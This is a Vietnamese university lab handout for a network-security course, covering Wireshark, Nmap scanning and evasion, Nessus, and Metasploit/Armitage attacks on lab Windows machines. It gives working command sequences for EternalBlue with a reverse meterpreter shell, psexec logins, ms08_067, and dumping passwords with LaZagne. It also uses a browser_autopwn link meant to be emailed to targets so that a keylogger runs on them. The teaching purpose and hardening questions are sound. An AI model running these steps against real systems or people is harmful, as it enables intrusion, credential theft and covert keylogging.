Trường Đại Học Công Nghệ Sài Gòn

Khoa Công Nghệ Thông Tin

http://www.stu.edu.vn

Bài thực hành chương 2

Nội dung yêu cầu: Sử dụng công cụ tấn công mạng máy tính để kiểm tra các lỗ hổng bảo mật

1. Nội dung thực hành

- Cài đặt máy ảo với VMware
- Cài đặt và tấn công với công cụ Wireshark, metaspoit, nessus,…
2. Cài đặt
1. Phiên bản cài đặt: Wireshark 1.8.3, Backtrack 5, nessus
2. Hệ điều hành sử dụng (hỗ trợ): Microsoft Win XP, Win Xp sp3, Win
server 2003.
1 Hướng dẫn sử dụng Wireshark
Bước 1: Download phần mềm Wireshark tại:
http://www.wireshark.org/download.html
Bước 2: Cài đặt Wireshark
Bước 3:
Sử dụng wireshark để phấn tích các gói tin trong hệ thống mạng. Để capture
được các gói tin thì wireshark phải được khởi động trước dữ liệu muốn capture.
Khi wireshark khởi động mà hình xuất hiện như sau:
Bước 4:
Để bắt đầu thu thập dữ liệu ta vào menu capture và chọn Option

Hộp thoại capture option xuất hiện với vài thông số

Bước 5:
 Chọn card mạng muốn thu thập dữ liệu
  Chọn card mạng ở chế độ promiscuous

 Nhấn để bắt đầu

 Xem chi tiết bao nhiêu gói tin thu thập được nhấn vào Statistic  Protocol
Hierarchy

Bước 6:
Thông tin thu thập được có thể lưu lại để phân tích trong tương lai

Để lưu lại thông tin, đầu tiên tanhấn nút stop quá trình thu thập và nhấn nút
save để lưu
 Khi ta đóng wireshark hay thoát khỏi wireshark hộp thoại thông báo lưu thông
tin sẽ xuất hiện, ta có thể đóng không lưu hay lưu.

2 Lab A: thực hiện phân tích gói tin Ping

Bước 1:
Sau khi chắc chắn các máy tính đã kết nối được với nhau và cài đặt wireshark.
Mở command line thực hiện ping địa chỉ IP của máy tính khác trong hệ thống
mạng, trong trường hợp lab này địa chỉ của máy ping kiểm tra là 10.0.0.33.
 Packet List pane trong wireshark hiện thị một số thông tin như hình bên dưới.

Nhìn vào packet list, ta thấy được các gói tin 4,5,19,20,26,27 liên quan đến giao
tin cần phân tích.
Có thể xem chi tiết địa chỉ nguồn, địa chỉ đích, giao thức,.. trong packet detail
pane hay xem chi tiết byte trong packet byte pane.

Nếu bạn thực hiện bước Lab A ở trên phù hợp với các gói tin được hiển thị
trong cửa sổ dòng lệnh ping và bị bắt bởi Wireshark.
Trả lời câu hỏi sau:
1. Giao thức nào được dùng trong lệnh ping?__________________________
2. Tên đầy đủ của giao thức:_______________________________________
3. Hai gói tin được sử dụng trong giao thức ping_______________________
4. Ping thuộc lớp mấy trong tầng TCP/IP_____________________________
5. Nhiệm vụ của ping trong hệ thống mạng là gi?______________________
____________________________________________________________
3 Lab B
Dùng công cụ scan mạng: Nmap, Nessus
3.1 Nmap
Sử dụng Nmap để thăm dò trong một subnet xem có bao nhiêu host up và các port
nào của host này mở. Từ đó ta xác định được đối tượng tấn công.
1. Scanning nmap
Lập bản đồ mạng (Network mapping)
Phát hiện hệ điều hành(OS detection)
Dò tìm dịch vụ (Service discovery)
Kiểm tra bảo mật (Security auditing)
a. Sử dụng Nmap cho các mạng cục bộ
1. Host Scan
Quét máy chủ được sử dụng bởi người kiểm tra thâm nhập để xác định máy
chủ đang hoạt động trong mạng bằng cách gửi các gói yêu cầu ARP đến tất cả hệ
thống trong mạng đó
Syntax: nmap -sP <target IP range>
nmap -sn <target IP range>
nmap -sP 192.168.1.1-225

2. Port scan /TCP scan

Nếu người kiểm tra thâm nhập muốn xác định trạng thái mở hoặc đóng của một
cổng cụ thể trên máy mục tiêu thì họ nên thực hiện quét cổng nmap.
Syntax: nmap -p [port number] <target IP range>
nmap -sT [port number] <target IP range>
nmap -p135 192.168.1.127
 Port List
nmap -p135,139 192.168.1.127
 Port Range
nmap -p1-1000 192.168.1.127

 ALL Ports
nmap -p1-65535 192.168.1.127 –open
 Specific Ports by Protocols
Syntax: nmap -pT:25,U:53 <target>
3. Port Service name
Nếu bạn không biết số cổng chính xác để liệt kê thì bạn cũng có thể đề
cập đến tên dịch vụ để quét trạng thái cổng
Syntax: nmap –p[service]<target>
nmap -p msrpc 192.168.1.127

4. UDP Scan
Các dịch vụ UDP hầu như bị bỏ qua trong quá trình kiểm tra thâm nhập,
nhưng những người kiểm tra khả năng thâm nhập tốt biết rằng chúng
thường tiết lộ thông tin thiết yếu của máy chủ hoặc thậm chí có thể dễ bị
tấn công hơn nữa được sử dụng để xâm nhập máy chủ. Phương pháp này
 trình bày cách sử dụng Nmap để liệt kê tất cả các cổng UDP đang mở
trên máy chủ.
syntax: nmap –sU <target>
nmap -sU 192.168.1.127
 UDP Port Range
Syntax: nmap -p1-500 -sU <target>
 ALL UDP PORT
Syntax: nmap -sU -p- <target>
5. Quét Nmap “nhanh" (-F) trên phạm vi mạng có thể tạo nhanh sách tất cả
các địa chỉ IP
nmap -F 192.168.0.0/24
nmap -F wonderhowto.com

6. Nmap có thể cho thấy hệ điều hành (-O) đang được sử dụng
nmap -O 104.193.19.59

7. Tìm hiểu về các phiên bản phần mềm đang chạy với các cổng đang mở
nmap -sV 104.193.19.59

8. Nhập địa chỉ IP đích và sau đó nhập -A để bật tính năng phát hiện hệ điều
hành, phát hiện phiên bản
nmap 104.193.19.59 -A
9. Tính toán mạng con và quét một phạm vi cụ thể để tìm ra các thiết bị
 ipcalc 127.0.0.1

10. Nmap để tiến hành quét ARP với truy vấn -PR
nmap -PR 192.168.0.0/24
nmap -sn 192.168.1.100
11. Port scanning
a. TCP SYN (Stealth) Scan (-sS)
nmap -p22,113,139 scanme.nmap.org
nmap -d --packet-trace -p22,113,139 scanme.nmap.org
b. TCP Connect Scan (-sT)
nmap -T4 -sT scanme.nmap.org
c. UDP Scan (-sU)
nmap -sU -v felix
d. TCP FIN, NULL, and Xmas Scans (-sF, -sN, -sX)
nmap -sF -T4 para (fin xmas scan)
nmap -sS -T4 docsrv.caldera.com (syn scan)
nmap -sF -T4 docsrv.caldera.com (fin scan)
nmap -sF --scanflags PSH para (psh scan)

12. Firewall/IDS Evasion and Spoofing

a. Xác định firewall
nmap –v –sA –n www.yourorg.com –oA firewallaudit
b. FIN scan against stateless firewall
nmap -sF -p1-100 -T4 para

c. Bypassing Windows IPsec filter using source port 88

nmap -sS -v -v -Pn 172.25.0.14

13. Timing Template Scan

T0: paranoid
T1: sneaky
 T2: polite
T3: normal
T4: aggressive
T5: insane
Syntax: nmap T[option] <target>
nmap –T4 192.168.1.127

14. Exclude Scan

nmap -F 192.168.1.110-255 --exclude 192.168.1.114
15. Example
16. Check vulns
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
 nmap -sV --script=vulscan/vulscan.nse www.example.com

17. Http-enum
map -sV –script=http-enum 127.0.0.1
Trong backtrack ta sử dụng zenmap là phần mềm Nmap có giao diện.

Giao diện Nmap xuất hiện, nhập subnet mạng cần scan
Kết quả scan trong nmap hiển thị các thông số về os, port, service và version. Dựa
vào đó ta phân tích và đánh giá các đối tượng nào sẽ là đối tượng tấn công.
Tuy nhiên trong Nmap không cho ta biết được các host đó đang có lỗ hổng nào có
thể tấn công được, để dò lỗ hổng có thể sử dụng phần mềm Retina hay Nessus.
Trong lab này sử dụng phần mềm Nessus

3.2 Nessus
Cài đặt nessus trong Backtrack
1. Search xem các phiên bản nessus trong backtrack
root@apt-get update //cập nhật các packet
root@aptitude search nessus //search xem gói nessus có hỗ trợ trong backtrack
 Trong phiên bản backtrack 5, nessus đã được cài sẵn.
2. Khởi động nessus

3. Đăng kí tài khoản

Để sử dụng được nessus ta cần đang kí tài khoản tại trang:
http://www.nessus.org/register

Khi đăng kí thành công ta nhận được key được gởi tới email mà ta đăng kí.
Nhập key với lệnh:
/opt/nessus/bin/nessus-fetch –register YOUR REGISTRATIN CODE
root@bt:~# /opt/nessus/bin/nessus-fetch --register E8A5-5367-982E-05CB-
972A

4. Tạo user admin

5. Scan lỗ hổng với nessus

Mở trình duyệt web (firefox)
https://127.0.0.1:8834
Kết quả:

Host chạy hệ điều hành win 2k3 có 4 lỗ hổng nguy hiểm, từ đó ta có thể tấn
công qua các lỗ hổng này. Lab kế tiếp ta dùng công cụ Armitage tấn công lỗ
hổng MS08_067.
4 Lab C:
Dùng công cụ Metaploit dựa vào lỗ hổng hệ điều hành xâm nhập vào chiếm
quyền điều khiển.
Trong lab này cần có 2 máy tính:
1. Máy ảo chạy hệ điều hành Kali
2. Máy dùng hệ điều hành Microsoft Windows Server 2008 (không bật firewall
client).
Bước 1: ScanEternal Blue Vulnerability in Remote PC
1. Cách 1: Dùng công cụ Nessus
2. Cách 2: Dùng escan
o Tải escan từ github
git clone https://github.com/peterpt/eternal_scanner.git && cd eternal_scanner
./escan
Nhập địa chỉ máy nạn nhân

3. Cách 3: Dùng Nmap

nmap -T4 -p445 --script vuln 192.168.1.106
 nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106

4. Dùng Metasploit
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106
msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit

Bước 2:
1. Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool
Corruption
a. Msfconsole
Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload
windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit

Từ ảnh chụp màn hình, bạn có thể thấy chúng ta đã có meterpreter session sau khi
khai thác tràn bộ đệm bằng cách ghi đè bộ đệm SMBV1.
meterpreter> sysinfo
 2. Microsoft Windows Authenticated User Code Execution
- Máy Windows Server2008 R2
msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ignite@123
msf exploit(windows/smb/psexec) > exploit

3. MS17-010 EternalRomance SMB Remote Code Execution

msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.1.105
msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj
msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123
msf exploit(windows/smb/ms17_010_psexec) > exploit
4. khởi động công cụ Armitage, có 2 cách khởi động:
https://www.offensive-security.com/metasploit-unleashed/armitage-scanning/
1. root@Armitage
2. Click Applications –> Backtrack –> Exploitation Tools –> Network
Exploitation Tools –> Metasploit Framework –> Armitage to run your
Armitage.
Sẽ xuất hiện giao diện kết nối Armitage.
Nhấn vào để khởi động Armitage

Nếu Connection bị từ chối không kết nối được database thực hiện bước tiếp theo
3. khởi động Msfgui để lấy account kết nối database
 Nhấn vào để khởi động một msfrpcd mới
Chờ cho msf khởi động thành công nhấn vào File  chọn show connection
detail

Hộp thoại connection detail sẽ xuất hiện với password mới

 4. khởi động lại Armitage với password mới

Connect thành công sẽ vào giao diện Armitage

Kiểm tra địa chỉ ip máy win XP

5. Trước khi tấn công, cần scan các máy trong mạng để xác định mục tiêu
tấn công, sử dụng Nmap.
 Nhập địa chỉ ip cần scan vào, ta có thể scan chính xác một đối tượng hay scan
toàn bộ dãy mạng, trong bài lab này máy đối tượng có địa chỉ ip: 10.0.0.33, ta có
thể scan chính xác ip 10.0.0.33 hay scan toàn bộ lớp mạng 10.0.0.0/24.

Sau khi scan thành công sẽ xuất hiện giao diện hiện đối tượng ta muốn tấn công.
 Nhấn Ok hoàn thành qua trình scan đối tượng
6. Click phải chọn Auto-layout  Stack cố định đối tượng

7. Bước này tìm cách tấn công qua port, ta thấy máy win XP đang mở các
port 139,445,1433,3389, ta tìm cách tấn công qua các port đang mở.
Chọn Attacks  Find attacks  by port

Sau khi phân tích thành công sẽ xuất hiện thông báo và nhấn OK để hoàn thành
và thực hiện bước kế tiếp.
8. Click phải đối tượng chọn Attack  smb  check exploits

9. sau khi check exploits thành công, tìm lỗ hổng nào là đối tượng có thể
tấn công vào được ta sẽ tìm thấy câu hiển thị: “The target is vulnerable”.

10. click phải vào máy 10.0.0.3 chọn Attack  smb  chọn lỗ hổng có
thể vulnerable, trong lab này lỗ hổng tên “ms08_067_netapi”.
 Khi chọn xong lỗ hổng sẽ xuất hiện hộp thoại chi tiết các phương pháp tấn công,

nhấn vào Launch để hoàn thành.

Khi tấn công thành công đối tượng sẽ chuyển từ màu xanh sang màu đỏ.
 11.chọn cách để xâm nhập hay chiếm quyền điều khiển máy tính 10.0.0.33.
Có nhiều cách sử dụng để tấn công xâm nhập:
1. Dùng Explore để browse file hay show processes, screenshot
2. Dùng interact để chạy command shell để shutdown hay restart,..
 3. Cài phầm mềm gián điệp hay cấy trojan, virus vào máy
Nếu thực hiện theo đúng hướng dẫn lab B, ta sẽ tấn công được máy tính thiếu
tính bảo mật, có nhiều lỗ hổng chưa được fix.
1. Upload lazagne

2. Help screen
3. Lấy tất cả password
Câu hỏi:
1. Vì sao máy 10.0.0.3 dễ dàng bị tấn công?___________________________
_________________________________________________________________
2. Làm thế nào để tăng tính bảo mật cho máy 10.0.0.3 không bị tấn công?___
_________________________________________________________________
_________________________________________________________________
3. Tăng tính bảo mật cho máy 10.0.0.33 và thực hiện tấn công metaploit lại
xem máy 10.0.0.33 có tấn công được không?________________________
Yêu cầu lab:
 1. Thực hiện 2 bài lab và quay phim lại với các công cụ hỗ trợ quay (như
Camtaisa hay tương đương)
2. Sử dụng phầm mềm tạo máy ảo như Vmware hay tương đương
3. Cài đặt các phần mềm như hướng dẫn
4. Trả lời các câu hỏi trong các lab
5. Nộp lại các file quay phim
5 Lab D
Sử dụng Keylog với msfconsole
1. Khởi động msfconsole

2. Exploit window
msf > use auxiliary /server/browser_autopwn
Ta có thể dùng lệnh show options để xem các lệnh cài đặt trong
browser_autopwn

 Cần set giá trị Lhost (host nhận thông tin – địa chỉ máy backtrack)
 Set giá trị port
 Set uri
 Ta start browser_autopwn bằng lệnh exploit or run

Sau khi quá trình chạy browser _autopwn hoàn thành ta sẽ thấy được link như sau:
http://10.0.0.45:80/stu

Ta gởi link này cho các đối tượng qua email, yahoo,..
Khi click vào link các đối tượng sẽ dính keylog.
Trên máy backtrack ta sẽ thấy được keylog chèn vào máy nạn nhân (notepad.exe)

3. Chiếm quyền máy nạn nhân với meterpreter

Sử dụng lệnh: root@sessions –l để xem số session có thể sử dụng
 Dùng lệnh: root@session –i 1(số id connect 1,2,3)

Bây giờ ta chiếm quyền máy 10.0.0.42 tương tự như dùng công cụ Armitage
Để biết các lệnh trong meterpreter ta dùng lệnh:Meterpreter > ?
Để start keylog : meterpreter > keyscan_start
Xem kết quả: meterpreter > keyscan_dump